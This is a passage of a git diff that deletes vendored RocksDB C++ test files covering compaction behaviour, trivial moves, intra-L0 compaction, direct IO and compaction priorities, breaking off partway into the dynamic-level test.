-  options.max_subcompactions = max_subcompactions_;
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-  for (int key = 64 * kEntriesPerBuffer; key >= 0; --key) {
-    ASSERT_OK(Put(1, ToString(key), RandomString(&rnd, kTestValueSize)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-  dbfull()->TEST_WaitForCompact();
-
-  ColumnFamilyMetaData cf_meta;
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  int output_level = static_cast<int>(cf_meta.levels.size()) - 1;
-  for (int file_picked = 5; file_picked > 0; --file_picked) {
-    std::set<std::string> overlapping_file_names;
-    std::vector<std::string> compaction_input_file_names;
-    for (int f = 0; f < file_picked; ++f) {
-      int level = 0;
-      auto file_meta = PickFileRandomly(cf_meta, &rnd, &level);
-      compaction_input_file_names.push_back(file_meta->name);
-      GetOverlappingFileNumbersForLevelCompaction(
-          cf_meta, options.comparator, level, output_level,
-          file_meta, &overlapping_file_names);
-    }
-
-    ASSERT_OK(dbfull()->CompactFiles(
-        CompactionOptions(), handles_[1],
-        compaction_input_file_names,
-        output_level));
-
-    // Make sure all overlapping files do not exist after compaction
-    dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-    VerifyCompactionResult(cf_meta, overlapping_file_names);
-  }
-
-  // make sure all key-values are still there.
-  for (int key = 64 * kEntriesPerBuffer; key >= 0; --key) {
-    ASSERT_NE(Get(1, ToString(key)), "NOT_FOUND");
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, PartialCompactionFailure) {
-  Options options;
-  const int kKeySize = 16;
-  const int kKvSize = 1000;
-  const int kKeysPerBuffer = 100;
-  const int kNumL1Files = 5;
-  options.create_if_missing = true;
-  options.write_buffer_size = kKeysPerBuffer * kKvSize;
-  options.max_write_buffer_number = 2;
-  options.target_file_size_base =
-      options.write_buffer_size *
-      (options.max_write_buffer_number - 1);
-  options.level0_file_num_compaction_trigger = kNumL1Files;
-  options.max_bytes_for_level_base =
-      options.level0_file_num_compaction_trigger *
-      options.target_file_size_base;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-  options.max_subcompactions = max_subcompactions_;
-
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  // stop the compaction thread until we simulate the file creation failure.
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  options.env = env_;
-
-  DestroyAndReopen(options);
-
-  const int kNumInsertedKeys =
-      options.level0_file_num_compaction_trigger *
-      (options.max_write_buffer_number - 1) *
-      kKeysPerBuffer;
-
-  Random rnd(301);
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  for (int k = 0; k < kNumInsertedKeys; ++k) {
-    keys.emplace_back(RandomString(&rnd, kKeySize));
-    values.emplace_back(RandomString(&rnd, kKvSize - kKeySize));
-    ASSERT_OK(Put(Slice(keys[k]), Slice(values[k])));
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-
-  dbfull()->TEST_FlushMemTable(true);
-  // Make sure the number of L0 files can trigger compaction.
-  ASSERT_GE(NumTableFilesAtLevel(0),
-            options.level0_file_num_compaction_trigger);
-
-  auto previous_num_level0_files = NumTableFilesAtLevel(0);
-
-  // Fail the first file creation.
-  env_->non_writable_count_ = 1;
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  // Expect compaction to fail here as one file will fail its
-  // creation.
-  ASSERT_TRUE(!dbfull()->TEST_WaitForCompact().ok());
-
-  // Verify L0 -> L1 compaction does fail.
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-
-  // Verify all L0 files are still there.
-  ASSERT_EQ(NumTableFilesAtLevel(0), previous_num_level0_files);
-
-  // All key-values must exist after compaction fails.
-  for (int k = 0; k < kNumInsertedKeys; ++k) {
-    ASSERT_EQ(values[k], Get(keys[k]));
-  }
-
-  env_->non_writable_count_ = 0;
-
-  // Make sure RocksDB will not get into corrupted state.
-  Reopen(options);
-
-  // Verify again after reopen.
-  for (int k = 0; k < kNumInsertedKeys; ++k) {
-    ASSERT_EQ(values[k], Get(keys[k]));
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, DeleteMovedFileAfterCompaction) {
-  // iter 1 -- delete_obsolete_files_period_micros == 0
-  for (int iter = 0; iter < 2; ++iter) {
-    // This test triggers move compaction and verifies that the file is not
-    // deleted when it's part of move compaction
-    Options options = CurrentOptions();
-    options.env = env_;
-    if (iter == 1) {
-      options.delete_obsolete_files_period_micros = 0;
-    }
-    options.create_if_missing = true;
-    options.level0_file_num_compaction_trigger =
-        2;  // trigger compaction when we have 2 files
-    OnFileDeletionListener* listener = new OnFileDeletionListener();
-    options.listeners.emplace_back(listener);
-    options.max_subcompactions = max_subcompactions_;
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    // Create two 1MB sst files
-    for (int i = 0; i < 2; ++i) {
-      // Create 1MB sst file
-      for (int j = 0; j < 100; ++j) {
-        ASSERT_OK(Put(Key(i * 50 + j), RandomString(&rnd, 10 * 1024)));
-      }
-      ASSERT_OK(Flush());
-    }
-    // this should execute L0->L1
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ("0,1", FilesPerLevel(0));
-
-    // block compactions
-    test::SleepingBackgroundTask sleeping_task;
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                   Env::Priority::LOW);
-
-    options.max_bytes_for_level_base = 1024 * 1024;  // 1 MB
-    Reopen(options);
-    std::unique_ptr<Iterator> iterator(db_->NewIterator(ReadOptions()));
-    ASSERT_EQ("0,1", FilesPerLevel(0));
-    // let compactions go
-    sleeping_task.WakeUp();
-    sleeping_task.WaitUntilDone();
-
-    // this should execute L1->L2 (move)
-    dbfull()->TEST_WaitForCompact();
-
-    ASSERT_EQ("0,0,1", FilesPerLevel(0));
-
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    ASSERT_EQ(metadata.size(), 1U);
-    auto moved_file_name = metadata[0].name;
-
-    // Create two more 1MB sst files
-    for (int i = 0; i < 2; ++i) {
-      // Create 1MB sst file
-      for (int j = 0; j < 100; ++j) {
-        ASSERT_OK(Put(Key(i * 50 + j + 100), RandomString(&rnd, 10 * 1024)));
-      }
-      ASSERT_OK(Flush());
-    }
-    // this should execute both L0->L1 and L1->L2 (merge with previous file)
-    dbfull()->TEST_WaitForCompact();
-
-    ASSERT_EQ("0,0,2", FilesPerLevel(0));
-
-    // iterator is holding the file
-    ASSERT_OK(env_->FileExists(dbname_ + moved_file_name));
-
-    listener->SetExpectedFileName(dbname_ + moved_file_name);
-    iterator.reset();
-
-    // this file should have been compacted away
-    ASSERT_NOK(env_->FileExists(dbname_ + moved_file_name));
-    listener->VerifyMatchedCount(1);
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, CompressLevelCompaction) {
-  if (!Zlib_Supported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-  // First two levels have no compression, so that a trivial move between
-  // them will be allowed. Level 2 has Zlib compression so that a trivial
-  // move to level 3 will not be allowed
-  options.compression_per_level = {kNoCompression, kNoCompression,
-                                   kZlibCompression};
-  int matches = 0, didnt_match = 0, trivial_move = 0, non_trivial = 0;
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Compaction::InputCompressionMatchesOutput:Matches",
-      [&](void* arg) { matches++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Compaction::InputCompressionMatchesOutput:DidntMatch",
-      [&](void* arg) { didnt_match++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are going to level 0
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to fill up level 0
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(4, GetSstFileCount(dbname_));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4", FilesPerLevel(0));
-
-  // (1, 4, 1)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,1", FilesPerLevel(0));
-
-  // (1, 4, 2)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,2", FilesPerLevel(0));
-
-  // (1, 4, 3)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,3", FilesPerLevel(0));
-
-  // (1, 4, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,4", FilesPerLevel(0));
-
-  // (1, 4, 5)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,5", FilesPerLevel(0));
-
-  // (1, 4, 6)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,6", FilesPerLevel(0));
-
-  // (1, 4, 7)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,7", FilesPerLevel(0));
-
-  // (1, 4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,8", FilesPerLevel(0));
-
-  ASSERT_EQ(matches, 12);
-  // Currently, the test relies on the number of calls to
-  // InputCompressionMatchesOutput() per compaction.
-  const int kCallsToInputCompressionMatch = 2;
-  ASSERT_EQ(didnt_match, 8 * kCallsToInputCompressionMatch);
-  ASSERT_EQ(trivial_move, 12);
-  ASSERT_EQ(non_trivial, 8);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_F(DBCompactionTest, SanitizeCompactionOptionsTest) {
-  Options options = CurrentOptions();
-  options.max_background_compactions = 5;
-  options.soft_pending_compaction_bytes_limit = 0;
-  options.hard_pending_compaction_bytes_limit = 100;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  ASSERT_EQ(100, db_->GetOptions().soft_pending_compaction_bytes_limit);
-
-  options.max_background_compactions = 3;
-  options.soft_pending_compaction_bytes_limit = 200;
-  options.hard_pending_compaction_bytes_limit = 150;
-  DestroyAndReopen(options);
-  ASSERT_EQ(150, db_->GetOptions().soft_pending_compaction_bytes_limit);
-}
-
-// This tests for a bug that could cause two level0 compactions running
-// concurrently
-// TODO(aekmekji): Make sure that the reason this fails when run with
-// max_subcompactions > 1 is not a correctness issue but just inherent to
-// running parallel L0-L1 compactions
-TEST_F(DBCompactionTest, SuggestCompactRangeNoTwoLevel0Compactions) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 450 << 10;
-  options.target_file_size_base = 98 << 10;
-  options.max_write_buffer_number = 2;
-  options.max_background_compactions = 2;
-
-  DestroyAndReopen(options);
-
-  // fill up the DB
-  Random rnd(301);
-  for (int num = 0; num < 10; num++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"CompactionJob::Run():Start",
-        "DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:1"},
-       {"DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:2",
-        "CompactionJob::Run():End"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // trigger L0 compaction
-  for (int num = 0; num < options.level0_file_num_compaction_trigger + 1;
-       num++) {
-    GenerateNewRandomFile(&rnd, /* nowait */ true);
-    ASSERT_OK(Flush());
-  }
-
-  TEST_SYNC_POINT(
-      "DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:1");
-
-  GenerateNewRandomFile(&rnd, /* nowait */ true);
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_OK(experimental::SuggestCompactRange(db_, nullptr, nullptr));
-  for (int num = 0; num < options.level0_file_num_compaction_trigger + 1;
-       num++) {
-    GenerateNewRandomFile(&rnd, /* nowait */ true);
-    ASSERT_OK(Flush());
-  }
-
-  TEST_SYNC_POINT(
-      "DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:2");
-  dbfull()->TEST_WaitForCompact();
-}
-
-
-TEST_P(DBCompactionTestWithParam, ForceBottommostLevelCompaction) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::vector<std::string> values;
-  // File with keys [ 0 => 99 ]
-  for (int i = 0; i < 100; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1", FilesPerLevel(0));
-  // Compaction will do L0=>L1 (trivial move) then move L1 files to L3
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 3;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // File with keys [ 100 => 199 ]
-  for (int i = 100; i < 200; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1,0,0,1", FilesPerLevel(0));
-  // Compaction will do L0=>L1 L1=>L2 L2=>L3 (3 trivial moves)
-  // then compacte the bottommost level L3=>L3 (non trivial move)
-  compact_options = CompactRangeOptions();
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 4);
-  ASSERT_EQ(non_trivial_move, 1);
-
-  // File with keys [ 200 => 299 ]
-  for (int i = 200; i < 300; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1,0,0,1", FilesPerLevel(0));
-  trivial_move = 0;
-  non_trivial_move = 0;
-  compact_options = CompactRangeOptions();
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kSkip;
-  // Compaction will do L0=>L1 L1=>L2 L2=>L3 (3 trivial moves)
-  // and will skip bottommost level compaction
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,2", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 3);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  for (int i = 0; i < 300; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, IntraL0Compaction) {
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 5;
-  options.max_background_compactions = 2;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  const size_t kValueSize = 1 << 20;
-  Random rnd(301);
-  std::string value(RandomString(&rnd, kValueSize));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"LevelCompactionPicker::PickCompactionBySize:0",
-        "CompactionJob::Run():Start"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // index:   0   1   2   3   4   5   6   7   8   9
-  // size:  1MB 1MB 1MB 1MB 1MB 2MB 1MB 1MB 1MB 1MB
-  // score:                     1.5 1.3 1.5 2.0 inf
-  //
-  // Files 0-4 will be included in an L0->L1 compaction.
-  //
-  // L0->L0 will be triggered since the sync points guarantee compaction to base
-  // level is still blocked when files 5-9 trigger another compaction.
-  //
-  // Files 6-9 are the longest span of available files for which
-  // work-per-deleted-file decreases (see "score" row above).
-  for (int i = 0; i < 10; ++i) {
-    ASSERT_OK(Put(Key(0), ""));  // prevents trivial move
-    if (i == 5) {
-      ASSERT_OK(Put(Key(i + 1), value + value));
-    } else {
-      ASSERT_OK(Put(Key(i + 1), value));
-    }
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  std::vector<std::vector<FileMetaData>> level_to_files;
-  dbfull()->TEST_GetFilesMetaData(dbfull()->DefaultColumnFamily(),
-                                  &level_to_files);
-  ASSERT_GE(level_to_files.size(), 2);  // at least L0 and L1
-  // L0 has the 2MB file (not compacted) and 4MB file (output of L0->L0)
-  ASSERT_EQ(2, level_to_files[0].size());
-  ASSERT_GT(level_to_files[1].size(), 0);
-  for (int i = 0; i < 2; ++i) {
-    ASSERT_GE(level_to_files[0][i].fd.file_size, 1 << 21);
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, IntraL0CompactionDoesNotObsoleteDeletions) {
-  // regression test for issue #2722: L0->L0 compaction can resurrect deleted
-  // keys from older L0 files if L1+ files' key-ranges do not include the key.
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 5;
-  options.max_background_compactions = 2;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  const size_t kValueSize = 1 << 20;
-  Random rnd(301);
-  std::string value(RandomString(&rnd, kValueSize));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"LevelCompactionPicker::PickCompactionBySize:0",
-        "CompactionJob::Run():Start"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // index:   0   1   2   3   4    5    6   7   8   9
-  // size:  1MB 1MB 1MB 1MB 1MB  1MB  1MB 1MB 1MB 1MB
-  // score:                     1.25 1.33 1.5 2.0 inf
-  //
-  // Files 0-4 will be included in an L0->L1 compaction.
-  //
-  // L0->L0 will be triggered since the sync points guarantee compaction to base
-  // level is still blocked when files 5-9 trigger another compaction. All files
-  // 5-9 are included in the L0->L0 due to work-per-deleted file decreasing.
-  //
-  // Put a key-value in files 0-4. Delete that key in files 5-9. Verify the
-  // L0->L0 preserves the deletion such that the key remains deleted.
-  for (int i = 0; i < 10; ++i) {
-    // key 0 serves both to prevent trivial move and as the key we want to
-    // verify is not resurrected by L0->L0 compaction.
-    if (i < 5) {
-      ASSERT_OK(Put(Key(0), ""));
-    } else {
-      ASSERT_OK(Delete(Key(0)));
-    }
-    ASSERT_OK(Put(Key(i + 1), value));
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  std::vector<std::vector<FileMetaData>> level_to_files;
-  dbfull()->TEST_GetFilesMetaData(dbfull()->DefaultColumnFamily(),
-                                  &level_to_files);
-  ASSERT_GE(level_to_files.size(), 2);  // at least L0 and L1
-  // L0 has a single output file from L0->L0
-  ASSERT_EQ(1, level_to_files[0].size());
-  ASSERT_GT(level_to_files[1].size(), 0);
-  ASSERT_GE(level_to_files[0][0].fd.file_size, 1 << 22);
-
-  ReadOptions roptions;
-  std::string result;
-  ASSERT_TRUE(db_->Get(roptions, Key(0), &result).IsNotFound());
-}
-
-TEST_F(DBCompactionTest, OptimizedDeletionObsoleting) {
-  // Deletions can be dropped when compacted to non-last level if they fall
-  // outside the lower-level files' key-ranges.
-  const int kNumL0Files = 4;
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  // put key 1 and 3 in separate L1, L2 files.
-  // So key 0, 2, and 4+ fall outside these levels' key-ranges.
-  for (int level = 2; level >= 1; --level) {
-    for (int i = 0; i < 2; ++i) {
-      Put(Key(2 * i + 1), "val");
-      Flush();
-    }
-    MoveFilesToLevel(level);
-    ASSERT_EQ(2, NumTableFilesAtLevel(level));
-  }
-
-  // Delete keys in range [1, 4]. These L0 files will be compacted with L1:
-  // - Tombstones for keys 2 and 4 can be dropped early.
-  // - Tombstones for keys 1 and 3 must be kept due to L2 files' key-ranges.
-  for (int i = 0; i < kNumL0Files; ++i) {
-    Put(Key(0), "val");  // sentinel to prevent trivial move
-    Delete(Key(i + 1));
-    Flush();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = 0; i < kNumL0Files; ++i) {
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), Key(i + 1), &value).IsNotFound());
-  }
-  ASSERT_EQ(2, options.statistics->getTickerCount(
-                   COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE));
-  ASSERT_EQ(2,
-            options.statistics->getTickerCount(COMPACTION_KEY_DROP_OBSOLETE));
-}
-
-INSTANTIATE_TEST_CASE_P(DBCompactionTestWithParam, DBCompactionTestWithParam,
-                        ::testing::Values(std::make_tuple(1, true),
-                                          std::make_tuple(1, false),
-                                          std::make_tuple(4, true),
-                                          std::make_tuple(4, false)));
-
-TEST_P(DBCompactionDirectIOTest, DirectIO) {
-  Options options = CurrentOptions();
-  Destroy(options);
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.use_direct_io_for_flush_and_compaction = GetParam();
-  options.env = new MockEnv(Env::Default());
-  Reopen(options);
-  bool readahead = false;
-  SyncPoint::GetInstance()->SetCallBack(
-      "TableCache::NewIterator:for_compaction", [&](void* arg) {
-        bool* use_direct_reads = static_cast<bool*>(arg);
-        ASSERT_EQ(*use_direct_reads,
-                  options.use_direct_io_for_flush_and_compaction);
-      });
-  SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::OpenCompactionOutputFile", [&](void* arg) {
-        bool* use_direct_writes = static_cast<bool*>(arg);
-        ASSERT_EQ(*use_direct_writes,
-                  options.use_direct_io_for_flush_and_compaction);
-      });
-  if (options.use_direct_io_for_flush_and_compaction) {
-    SyncPoint::GetInstance()->SetCallBack(
-        "SanitizeOptions:direct_io", [&](void* arg) {
-          readahead = true;
-        });
-  }
-  SyncPoint::GetInstance()->EnableProcessing();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  MakeTables(3, "p", "q", 1);
-  ASSERT_EQ("1,1,1", FilesPerLevel(1));
-  Compact(1, "p1", "p9");
-  ASSERT_FALSE(readahead ^ options.use_direct_io_for_flush_and_compaction);
-  ASSERT_EQ("0,0,1", FilesPerLevel(1));
-  Destroy(options);
-  delete options.env;
-}
-
-INSTANTIATE_TEST_CASE_P(DBCompactionDirectIOTest, DBCompactionDirectIOTest,
-                        testing::Bool());
-
-class CompactionPriTest : public DBTestBase,
-                          public testing::WithParamInterface<uint32_t> {
- public:
-  CompactionPriTest() : DBTestBase("/compaction_pri_test") {
-    compaction_pri_ = GetParam();
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  uint32_t compaction_pri_;
-};
-
-TEST_P(CompactionPriTest, Test) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 16 * 1024;
-  options.compaction_pri = static_cast<CompactionPri>(compaction_pri_);
-  options.hard_pending_compaction_bytes_limit = 256 * 1024;
-  options.max_bytes_for_level_base = 64 * 1024;
-  options.max_bytes_for_level_multiplier = 4;
-  options.compression = kNoCompression;
-
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  const int kNKeys = 5000;
-  int keys[kNKeys];
-  for (int i = 0; i < kNKeys; i++) {
-    keys[i] = i;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  for (int i = 0; i < kNKeys; i++) {
-    ASSERT_OK(Put(Key(keys[i]), RandomString(&rnd, 102)));
-  }
-
-  dbfull()->TEST_WaitForCompact();
-  for (int i = 0; i < kNKeys; i++) {
-    ASSERT_NE("NOT_FOUND", Get(Key(i)));
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    CompactionPriTest, CompactionPriTest,
-    ::testing::Values(CompactionPri::kByCompensatedSize,
-                      CompactionPri::kOldestLargestSeqFirst,
-                      CompactionPri::kOldestSmallestSeqFirst,
-                      CompactionPri::kMinOverlappingRatio));
-
-#endif // !defined(ROCKSDB_LITE)
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_dynamic_level_test.cc b/thirdparty/rocksdb/db/db_dynamic_level_test.cc
deleted file mode 100644
index f968e7f..0000000
--- a/thirdparty/rocksdb/db/db_dynamic_level_test.cc
+++ /dev/null
@@ -1,506 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#if !defined(ROCKSDB_LITE)
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-class DBTestDynamicLevel : public DBTestBase {
- public:
-  DBTestDynamicLevel() : DBTestBase("/db_dynamic_level_test") {}
-};
-
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase) {
-  if (!Snappy_Supported() || !LZ4_Supported()) {
-    return;
-  }
-  // Use InMemoryEnv, or it would be too slow.
-  unique_ptr<Env> env(new MockEnv(env_));
-
-  const int kNKeys = 1000;
-  int keys[kNKeys];
-
-  auto verify_func = [&]() {
-    for (int i = 0; i < kNKeys; i++) {
-      ASSERT_NE("NOT_FOUND", Get(Key(i)));
-      ASSERT_NE("NOT_FOUND", Get(Key(kNKeys * 2 + i)));
-      if (i < kNKeys / 10) {
-        ASSERT_EQ("NOT_FOUND", Get(Key(kNKeys + keys[i])));
-      } else {
-        ASSERT_NE("NOT_FOUND", Get(Key(kNKeys + keys[i])));
-      }
-    }
-  };
-
-  Random rnd(301);
-  for (int ordered_insert = 0; ordered_insert <= 1; ordered_insert++) {
-    for (int i = 0; i < kNKeys; i++) {
-      keys[i] = i;
-    }
-    if (ordered_insert == 0) {
-      std::random_shuffle(std::begin(keys), std::end(keys));
-    }
-    for (int max_background_compactions = 1; max_background_compactions < 4;
-         max_background_compactions += 2) {
-      Options options;
-      options.env = env.get();
-      options.create_if_missing = true;
-      options.write_buffer_size = 2048;
-      options.max_write_buffer_number = 2;
-      options.level0_file_num_compaction_trigger = 2;
-      options.level0_slowdown_writes_trigger = 2;
-      options.level0_stop_writes_trigger = 2;
-      options.target_file_size_base = 2048;
-      options.level_compaction_dynamic_level_bytes = true;
-      options.max_bytes_for_level_base = 10240;
-      options.max_bytes_for_level_multiplier = 4;
-      options.soft_rate_limit = 1.1;
-      options.max_background_compactions = max_background_compactions;
-      options.num_levels = 5;
-
-      options.compression_per_level.resize(3);
-      options.compression_per_level[0] = kNoCompression;
-      options.compression_per_level[1] = kLZ4Compression;
-      options.compression_per_level[2] = kSnappyCompression;
-      options.env = env_;
-
-      DestroyAndReopen(options);
-
-      for (int i = 0; i < kNKeys; i++) {
-        int key = keys[i];
-        ASSERT_OK(Put(Key(kNKeys + key), RandomString(&rnd, 102)));
-        ASSERT_OK(Put(Key(key), RandomString(&rnd, 102)));
-        ASSERT_OK(Put(Key(kNKeys * 2 + key), RandomString(&rnd, 102)));
-        ASSERT_OK(Delete(Key(kNKeys + keys[i / 10])));
-        env_->SleepForMicroseconds(5000);
-      }
-
-      uint64_t int_prop;
